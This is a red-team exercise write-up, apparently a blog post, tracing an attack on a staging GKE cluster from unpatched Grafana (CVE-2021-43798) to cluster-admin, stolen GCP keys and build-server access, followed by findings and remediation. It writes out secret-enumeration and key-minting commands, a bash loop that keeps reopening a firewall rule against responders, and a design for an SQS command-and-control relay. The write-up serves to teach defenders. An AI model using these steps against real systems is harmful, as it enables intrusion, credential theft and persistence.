Red Team Exercise: Unpatched Grafana to Cluster Takeover

This post is about a red/blue team exercise we ran on a recent project against a staging cluster. I led the red team. The goal was to demonstrate how far an attacker could get from a starting position of external network access. The finding was a complete chain from an unpatched service to full cluster control — achieved entirely through misconfigurations, no zero-days required. I'm writing this because the chain illustrates something important about how real attacks work.

Scope: staging cluster only, no production systems, no actual data exfiltration outside a controlled log. The blue team's job was to detect and respond. Everything described here was authorized, documented, and scoped in advance.

Initial Access: Unpatched Grafana

Reconnaissance identified a Grafana instance running on a non-standard port, reachable from the public internet. The GKE firewall rule had a source range of 0.0.0.0/0 — open to everything. The rule had a description of "DEBUG" in the GKE firewall config, which told the whole story: an engineer had opened it wide while troubleshooting something and never removed it. The monitoring subnet restriction that should have been there wasn't.

The Grafana version was current as of roughly 18 months prior, which placed it in range of CVE-2021-43798. That CVE is a path traversal vulnerability in Grafana's plugin serving code — unauthenticated requests to URLs like /public/plugins/alertlist/../../../ could read arbitrary files on the server. It was a real, well-documented, widely exploited vulnerability with a patch available. The instance just hadn't been updated.

I'll be clear about what I'm describing: this is a published CVE with a patch. The educational point is about the misconfiguration that left it unpatched and reachable, not about exploiting unpatched systems without authorization. If you're running Grafana, check your version.

With unauthenticated access through the path traversal, the next question was: what's interesting on this server?

What You Can Do With Unauthenticated Grafana Access

Even without the path traversal, many Grafana instances are misconfigured to allow anonymous access or have weak credentials. If you can reach Grafana's UI or API without authentication, you can:

Read all dashboards. Dashboards contain the queries and data source references for everything that's being monitored. This is a map of what services exist and how they're instrumented.
Read data source configurations via the API: GET /api/datasources. This returns the list of data sources — Prometheus, InfluxDB, CloudWatch, whatever is configured.

The data source configuration is where this gets serious. Grafana stores connection details for data sources, and for some data source types, it stores credentials in plaintext in the configuration that the API returns. In this case, the Prometheus data source configuration contained a bearer token for authentication.

{
  "type": "prometheus",
  "url": "http://prometheus.monitoring.svc.cluster.local:9090",
  "basicAuth": false,
  "jsonData": {},
  "secureJsonFields": {
    "httpHeaderValue1": true
  }
}

The actual token value is masked in the API response for secured fields — but the path traversal let me read the Grafana database file directly, and the token was stored there.

Stage 2: Prometheus Token to Cluster Admin

The token was a Kubernetes service account token. The Prometheus service account is responsible for scraping metrics from cluster nodes and pods — it needs permission to read metrics endpoints across the cluster. In this staging cluster, that service account had been granted cluster-admin privileges.

This is a common mistake, and I want to be precise about why it happens: when setting up Prometheus, you follow the documentation, you need permissions to scrape node metrics, and the path of least resistance is to grant a broad role. The staging cluster often gets this treatment more than production — it's just staging, the thinking goes. But staging clusters aren't isolated from the security practices that matter, especially when there are shared network paths or when staging credentials can be escalated.

With the token:

kubectl --token=$PROMETHEUS_TOKEN --server=https://k8s-api-endpoint get nodes

That returned a list of all cluster nodes. Full cluster access confirmed.

Stage 3: GCP Service Account Secret in the Cluster

The first thing you do with cluster-admin is enumerate secrets. The cluster was running on GKE, and workloads regularly need GCP service account credentials to interact with Cloud APIs. Those credentials frequently end up as Kubernetes secrets.

kubectl --token=$PROMETHEUS_TOKEN get secrets --all-namespaces -o json | \
  jq '.items[] | select(.data."service_account.json" != null) | .metadata'

One secret stood out. A GCP service account key stored in a CI/CD namespace. The service account had been granted broad permissions — roles/iam.serviceAccountKeyAdmin among others. This meant it could not only access GCP resources, but create new service account keys for other service accounts. That's a significant escalation: with the ability to generate keys, you can mint persistent credentials that aren't tied to the Kubernetes session you came in through.

The service account also had access to the build server — a GCP VM running the CI/CD toolchain.

Stage 4: Build Server Access and Key Generation

From outside the cluster, using the exfiltrated GCP service account key:

gcloud auth activate-service-account --key-file=sa-key.json
gcloud compute ssh build-server --zone=us-central1-a

On the build server, we found additional service account keys in the CI/CD tooling's configuration, along with access to GCS buckets used for build artifacts and staging deployments. More importantly, the key admin permissions let us generate new credentials:

gcloud iam service-accounts keys create new-key.json \
  --iam-account=build-sa@project.iam.gserviceaccount.com

New keys persist independently of the Kubernetes tokens we came in through. Even if the cluster access got revoked, these new keys would still work.

Stage 5: Maintaining Persistence via Firewall Loop

Here's the part of the chain I'm most proud of from a tradecraft standpoint — and most embarrassed about from a security standpoint, since I was responsible for both.

The initial Grafana access depended on that DEBUG firewall rule staying open. A blue team response that deleted the rule would cut off our cluster API access. We needed a persistence mechanism that could survive a firewall change without requiring us to reestablish access from scratch.

We had GCP service account credentials with sufficient permissions to modify firewall rules. We set up a loop on infrastructure outside the cluster — a network of EC2 instances, eventually bouncing through a Raspberry Pi as an out-of-band control node — that continuously polled the GKE firewall and reset the 0.0.0.0/0 rule if it was removed:

# Running on external EC2 node, polling every 60 seconds
while true; do
  RULE=$(gcloud compute firewall-rules describe grafana-debug \
    --format='value(sourceRanges)' 2>/dev/null)
  if [[ "$RULE" != "0.0.0.0/0" ]]; then
    gcloud compute firewall-rules update grafana-debug \
      --source-ranges=0.0.0.0/0
  fi
  sleep 60
done

This meant the blue team was playing whack-a-mole: they'd delete or restrict the rule, and within a minute it was back open. From their perspective it must have looked like the rule was being restored by an automated process — which it was, just not one they controlled.

The practical effect: even after the blue team noticed the anomalous access and started responding, we retained cluster API access because the firewall kept reopening. gcloud container clusters get-credentials kept working.

The lesson here is about persistence at the infrastructure level rather than the application level. We didn't need a backdoor in the cluster itself — we had a backdoor in the network perimeter.

Stage 6: The C2 Attempt That Didn't Work

With persistent cluster access, I wanted to push further — establish a command-and-control foothold that would survive even if we lost the SA credentials. The idea was an SQS-driven kubectl exec loop: deploy a pod in the cluster that polls an SQS queue for commands and execs them inside the cluster, sending results back.

The design was straightforward: a container that runs in the cluster, polls an SQS queue I controlled via a simple boto3 loop, receives commands as messages, and executes them via subprocess — effectively a relay from outside the cluster into the cluster's network.

The implementation failed for a practical reason: the Docker image never got pulled. The build required pulling a base image, and by the time I had the deployment YAML ready, the blue team had successfully locked down egress from the cluster's nodes. The pod stayed in ImagePullBackOff. Without a pre-staged image in the cluster's internal registry, there was no way to get the container running.

This is a real lesson: C2 tooling you build on the fly during an exercise doesn't have the preparation of a real attacker's toolkit. A real attacker would have pre-positioned the image. We didn't have time to do that, and the window closed.

What We Still Had

The blue team locked us out of the cluster. The kubectl access was gone, the Grafana instance was taken down, and the DEBUG firewall rule was finally removed and locked. But we still had the GCP service account credentials we'd exfiltrated.

Those credentials had access to GCS buckets used for staging deployments. The staging environment's frontend assets — the compiled JS and HTML for the staging UI — were served directly from GCS buckets with public or de facto public access. We could read the staging application, enumerate configuration embedded in the frontend, and list what was deployed.

In a real attack, this is where you'd harvest API endpoints, auth tokens embedded in JS config files, backend URLs, feature flags, and anything else baked into the frontend build. The cluster was locked down, but the data layer was still accessible.

gcloud storage ls gs://staging-assets-bucket/
gcloud storage cp gs://staging-assets-bucket/main.js ./main.js
grep -E '(api|endpoint|token|key|secret)' main.js

We stopped here. The exercise was over and we had enough findings to fill a substantial report.

The Findings Report

Six findings, each necessary to understand the full chain:

Finding 1: Unpatched Grafana (CVE-2021-43798). The Grafana instance was running a version with a known critical path traversal vulnerability. CVSS 10.0. Remediation: immediate patch. Time to fix: 1 day.

Finding 2: Firewall rule 0.0.0.0/0 left open after debugging. The GKE firewall rule allowing access to Grafana had a source range of 0.0.0.0/0 and a description of "DEBUG" — meaning an engineer opened it to the internet while troubleshooting an issue and never cleaned it up. This finding in isolation was high severity: Grafana was publicly reachable with no network restriction whatsoever. Remediation: delete the DEBUG rule, add a properly-scoped rule restricted to the monitoring subnet. Time to fix: 5 minutes. This is the class of finding that keeps security teams up at night — not sophisticated, just forgotten.

Finding 3: Over-privileged Prometheus service account. The Prometheus service account had cluster-admin ClusterRoleBinding. Prometheus requires read access to cluster metrics endpoints — specifically, it needs permission to list nodes, pods, services, and endpoints, and to read metrics from the kubelet API. It does not need cluster-admin. Remediation: create a minimal ClusterRole with only the permissions Prometheus actually requires. Time to fix: half a day to create and validate the scoped role.

Finding 4: GCP service account key with iam.serviceAccountKeyAdmin stored as cluster secret. A GCP service account key with broad IAM permissions — including the ability to create new service account keys — was stored as a Kubernetes secret in a CI/CD namespace. Once we had cluster-admin access, this was trivially readable. The key admin permission is particularly dangerous: it transforms a single compromised credential into the ability to mint persistent, hard-to-revoke new credentials. Remediation: remove key admin from the service account; use Workload Identity instead of storing SA keys as Kubernetes secrets. Time to fix: 1–2 days.

Finding 5: Build server SA keys accessible from compromised GCP credentials. The build server's CI/CD toolchain had service account keys stored in configuration files. Once we had access to the build server via the compromised GCP SA, we could read these keys and use them independently. Combined with Finding 4, this gave us a second-order persistence mechanism: keys we could use to authenticate as the CI/CD service accounts without ever touching the Kubernetes cluster again. Remediation: rotate all build server SA keys; audit which service accounts have keys vs. using short-lived tokens. Time to fix: 1 day for rotation, 1 sprint for migration to keyless auth.

Finding 6: GCS staging buckets de facto publicly accessible. Frontend build artifacts for the staging environment were stored in GCS buckets accessible with the compromised service account credentials. Configuration embedded in the compiled JS (API endpoints, backend URLs, environment-specific config) was readable. This is a common pattern that teams underestimate: staging isn't production, but staging configuration often points to real APIs or contains real credentials for non-prod services. Remediation: audit GCS bucket permissions; strip sensitive configuration from compiled frontend assets; use runtime injection for environment-specific config. Time to fix: 1 sprint.

Each finding was rated medium or high in isolation. Combined, they were critical.

Remediation Details

The Prometheus RBAC scoping is worth spelling out because it's the finding most teams will encounter in some form:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: prometheus-minimal
rules:
- apiGroups: [""]
  resources: ["nodes", "nodes/proxy", "nodes/metrics", "services", "endpoints", "pods"]
  verbs: ["get", "list", "watch"]
- apiGroups: ["extensions", "networking.k8s.io"]
  resources: ["ingresses"]
  verbs: ["get", "list", "watch"]
- nonResourceURLs: ["/metrics", "/metrics/cadvisor"]
  verbs: ["get"]

This gives Prometheus what it needs to scrape cluster metrics. It does not give it access to secrets, no ability to create pods, no ability to modify RBAC policies. Binding this role instead of cluster-admin is the difference between "Prometheus token is interesting to an attacker" and "Prometheus token gives an attacker full cluster control."

For GCP service accounts in GKE, the right pattern is Workload Identity:

# Kubernetes ServiceAccount
apiVersion: v1
kind: ServiceAccount
metadata:
  name: prometheus
  namespace: monitoring
  annotations:
    iam.gke.io/gcp-service-account: prometheus@project.iam.gserviceaccount.com

# Bind the KSA to the GSA
gcloud iam service-accounts add-iam-policy-binding \
  prometheus@project.iam.gserviceaccount.com \
  --role roles/iam.workloadIdentityUser \
  --member "serviceAccount:project.svc.id.goog[monitoring/prometheus]"

With Workload Identity, there's no SA key to steal. The pod gets short-lived tokens issued by GKE's OIDC provider. If the pod is deleted or the workload identity binding is removed, access stops. No keys stored in secrets, nothing to exfiltrate and use from outside the cluster.

The Lesson: Attackers Chain Small Issues

This is the thing I want the post to land on, because it's the thing that's hardest to convey in a vulnerability report:

Fixing any one of the six findings would have significantly degraded or broken the chain. But the structural lesson is about where the chain is actually fragile.

Patch Grafana: no path traversal, no token access. Chain ends at step 1.
Remove the DEBUG firewall rule: Grafana isn't publicly reachable, regardless of the Grafana version. Chain ends before step 1.
Scope the Prometheus RBAC: the token is accessible but it can't enumerate secrets. Finding 4 is never discovered.
Use Workload Identity instead of SA key secrets: even with cluster-admin, there's no exportable key to take out. The GCP pivot never happens.
Remove key admin from the SA: we can't generate new persistent credentials. The external persistence loop is still possible with the original key, but we can't mint new ones.
Restrict GCS bucket access: even after losing cluster access, there's nothing useful to read.

Each individual finding, when reviewed by a security team in isolation, could plausibly be rated medium severity and scheduled for the next sprint. That's often what happens. The attacker doesn't see six medium-severity findings — they see a chain.

The persistence mechanism in this exercise is the thing I'd highlight for defensive teams: we were using GCP IAM permissions we found inside the cluster to maintain access to the cluster's network perimeter. The blue team was responding at the Kubernetes layer (locking down the cluster API, revoking service account tokens) while we were operating at the GCP IAM layer (resetting firewall rules with credentials that hadn't been revoked yet). Those are different control planes, and incident response needs to cover both simultaneously.

When you find an active intrusion, the response isn't just "lock down the cluster." It's: enumerate all credentials that were accessible to the attacker, rotate them, and audit every action taken with those credentials before the rotation. In this case, that meant the Prometheus SA token, the GCP SA key from the cluster secret, all keys on the build server, and any keys generated using the key admin permission. Revoking access to the cluster is step one. It's not the last step.

Defense in depth isn't just about having multiple security controls. It's about ensuring that when one control fails (and they do fail), the next control in the chain limits what an attacker can do with that failure. Here, the controls were: patching (failed), network segmentation (failed), RBAC scoping (failed), secret management (failed), SA key admin scoping (failed), GCS access controls (partially failed). Six independent failures in sequence.

If your staging environment has services that haven't been patched in 18 months, firewall rules that were "good enough" when set up, and service accounts that were granted broad permissions for convenience — run the drill. You may find the same chain.